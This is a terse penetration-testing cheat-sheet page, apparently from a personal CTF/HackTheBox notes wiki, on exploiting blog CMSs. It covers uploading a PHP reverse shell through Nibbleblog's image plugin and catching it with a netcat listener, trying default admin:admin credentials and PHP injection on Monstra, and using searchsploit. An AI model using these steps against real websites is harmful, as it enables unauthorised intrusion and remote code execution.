Blogs

PreviousApache NextColdfusion

Last updated 2 years ago

Was this helpful?

Blogs

Priority

Extends > Themes "Helloworld" > Save
System > Backup > Content > Files > Save something
System > Settings > Maintenance Mode <?php phpinfo(); ?> ..Save
Plugins are often exploitable
searchsploit
github 'issues'

REF

- Also has webapp/cms/scanner

Nibbleblog

Obtain Admin credentials > Activate My image plugin by visiting
Upload PHP shell, ignore warnings Visit
No matter what you NAME the php upload.. it will ALWAYS be "image.php" after uploading

Setup reverse.php
Upload: "reverse.php" with my IP

Execute:
http://10.129.1.135/nibbleblog/content/private/plugins/my_image/image.php

nc -nvlp 4444
Connected!

Monstra

TartarHTB

Monstra
https://$IP/webservices/monstra-3.0.4/
https://$IP/webservices/monstra-3.0.4/admin/

admin:admin  ..default works!

Try to edit themes! 
They are often php

Monstra > Extends > Themes
"Helloworld" > Save ..fails

System > Backup ..not created (not writeable)
Content > Files ..new directory (created)
Content > Files > File ..Fails

System > Settings > Maintenance Mode
<?php phpinfo(); ?>   ..Save Fails
Hello                 ..Save Fails

-----------------------
-----------------------
searchsploit monstra
github monstra > Issues > 
php code execution
Look for sqli or lfi

Gym Management

REF: Redteam CTF Defcon Pivonka found this vuln on his own! Actually a pubic/known exploit

PreviousApache NextColdfusion

Last updated 2 years ago

Was this helpful?